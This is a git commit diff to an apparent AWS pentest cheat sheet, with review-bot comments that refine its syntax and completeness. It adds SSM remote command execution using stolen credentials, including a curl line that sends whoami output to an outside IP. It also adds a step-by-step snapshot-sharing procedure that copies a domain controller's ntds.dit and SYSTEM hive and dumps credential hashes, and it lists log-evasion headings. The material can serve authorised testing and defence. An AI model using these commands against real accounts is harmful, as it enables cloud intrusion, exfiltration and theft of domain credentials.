AWS SSM + Shadow copy attack
parent 5d87804f71
commit 1f3a94ba88
|
@ -18,6 +18,7 @@
|
|||
* [AWS - Lambda - Extract function's code](#aws---lambda---extract-functions-code)
|
||||
* [AWS - SSM - Command execution](#aws---ssm---command-execution)
|
||||
* [AWS - Golden SAML Attack](#aws---golden-saml-attack)
|
||||
* [AWS - Shadow Copy Attack](#aws---shadow-copy-attack)
|
||||
* [Cover tracks by obfuscating Cloudtrail logs and Guard Duty](#cover-tracks-by-obfuscating-cloudtrail-logs-and-guard-duty)
|
||||
* [PenTest:IAMUser/KaliLinux](#)
|
||||
* [PenTest:IAMUser/ParrotLinux](#)
|
||||
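Review bot: The table-of-contents entry "AWS - Shadow Copy Attack" does not match the capitalisation of the section heading added further down, "## AWS - Shadow Copy attack". The link still resolves because the anchor is lowercased, but the heading should read "Attack" so that it agrees with this entry and with the neighbouring "AWS - Golden SAML Attack".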
|
@ -394,10 +395,24 @@ $ wget -O lambda-function.zip url-from-previous-query --profile uploadcreds
|
|||
|
||||
## AWS - SSM - Command execution
|
||||
|
||||
:warning: The ssm-user account is not removed from the system when SSM Agent is uninstalled.
|
||||
|
||||
SSM Agent is preinstalled, by default, on the following Amazon Machine Images (AMIs):
|
||||
* Windows Server 2008-2012 R2 AMIs published in November 2016 or later
|
||||
* Windows Server 2016 and 2019
|
||||
* Amazon Linux
|
||||
* Amazon Linux 2
|
||||
* Ubuntu Server 16.04
|
||||
* Ubuntu Server 18.04
|
||||
* Amazon ECS-Optimized
|
||||
|
||||
```powershell
|
||||
$ aws ssm describe-instance-information --profile stolencreds --region eu-west-1
|
||||
$ aws ssm send-command --instance-ids "INSTANCE-ID-HERE" --document-name "AWS-RunShellScript" --comment "IP Config" --parameters commands=ifconfig --output text --query "Command.CommandId" --profile stolencreds
|
||||
$ aws ssm list-command-invocations --command-id "COMMAND-ID-HERE" --details --query "CommandInvocations[].CommandPlugins[].{Status:Status,Output:Output}" --profile stolencreds
|
||||
|
||||
e.g:
|
||||
$ aws ssm send-command --instance-ids "i-05b████████adaa" --document-name "AWS-RunShellScript" --comment "whoami" --parameters commands='curl 162.243.███.███:8080/`whoami`' --output text --region=us-east-1
|
||||
```
|
||||
|
||||
## AWS - Golden SAML Attack
|
||||
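Review bot: The code fence in the SSM section is tagged powershell, but the commands inside use a "$" prompt and the example relies on backtick command substitution around whoami inside the single-quoted commands= value, which is POSIX shell syntax; tag the fence bash instead. The "e.g:" line is prose sitting inside the fence and should become a comment or move above the block. The options are also inconsistent across the commands: the first passes --region eu-west-1, the send-command and list-command-invocations lines pass no region, and the example uses --region=us-east-1 with no --profile. Finally, the ssm-user warning would read better with one sentence saying what creates that account, since the section never introduces it.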
|
@ -419,6 +434,28 @@ $ python .\shimit.py -idp http://adfs.lab.local/adfs/services/trust -pk key_file
|
|||
-u domain\admin -n admin@domain.com -r ADFS-admin -r ADFS-monitor -id 123456789012
|
||||
```
|
||||
|
||||
## AWS - Shadow Copy attack
|
||||
|
||||
Prerequisite:
|
||||
* EC2:CreateSnapshot
|
||||
* CloudCopy - https://github.com/Static-Flow/CloudCopy
|
||||
|
||||
1. Load AWS CLI with Victim Credentials that have at least CreateSnapshot permissions
|
||||
2. Run `"Describe-Instances"` and show in list for attacker to select
|
||||
3. Run `"Create-Snapshot"` on volume of selected instance
|
||||
4. Run `"modify-snapshot-attribute"` on new snapshot to set `"createVolumePermission"` to attacker AWS Account
|
||||
5. Load AWS CLI with Attacker Credentials
|
||||
6. Run `"run-instance"` command to create new linux ec2 with our stolen snapshot
|
||||
7. Ssh run `"sudo mkdir /windows"`
|
||||
8. Ssh run `"sudo mount /dev/xvdf1 /windows/"`
|
||||
9. Ssh run `"sudo cp /windows/Windows/NTDS/ntds.dit /home/ec2-user"`
|
||||
10. Ssh run `"sudo cp /windows/Windows/System32/config/SYSTEM /home/ec2-user"`
|
||||
11. Ssh run `"sudo chown ec2-user:ec2-user /home/ec2-user/*"`
|
||||
12. SFTP get `"/home/ec2-user/SYSTEM ./SYSTEM"`
|
||||
13. SFTP get `"/home/ec2-user/ntds.dit ./ntds.dit"`
|
||||
14. locally run `"secretsdump.py -system ./SYSTEM -ntds ./ntds.dit local -outputfile secrets'`, expects secretsdump to be on path
|
||||
|
||||
|
||||
## Cover tracks by obfuscating Cloudtrail logs and Guard Duty
|
||||
|
||||
:warning: When using awscli on Kali Linux, Pentoo and Parrot Linux, a log is generated based on the user-agent.
|
||||
|
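Review bot: The prerequisite list in the Shadow Copy section names only EC2:CreateSnapshot, yet step 2 calls Describe-Instances and step 4 calls modify-snapshot-attribute, so the list understates the permissions the procedure depends on; list every API call the steps use so a reader scoping or auditing an IAM policy sees the full set. Step 14 opens its command with a double quote and closes it with a single quote ("secretsdump.py ... -outputfile secrets'), which should be fixed. Command names are written three different ways ("Describe-Instances", "modify-snapshot-attribute", "run-instance"); use the CLI spelling throughout. Steps 7 to 13 assume the snapshot is of a Windows domain controller volume, which should be stated under the prerequisites.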